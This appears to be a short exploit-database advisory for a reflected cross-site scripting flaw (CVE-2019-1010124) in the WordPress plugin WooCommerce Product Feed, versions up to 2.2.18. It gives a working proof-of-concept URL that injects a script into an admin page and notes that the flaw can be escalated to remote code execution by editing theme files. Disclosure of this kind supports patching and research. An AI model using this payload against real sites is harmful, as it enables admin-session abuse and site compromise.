Share
# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting  
# Date: 30 August 2019  
# Exploit Author: Damian Ebelties (https://zerodays.lol/)  
# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/  
# Version: <= 2.2.18  
# Tested on: Ubuntu 18.04.1  
# CVE: CVE-2019-1010124  
  
The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,  
which leads to Cross-Site Scripting in the Admin Panel.  
  
Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme  
files via (for example) XHR requests with included Javascript.  
  
Proof-of-Concept:  
  
https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E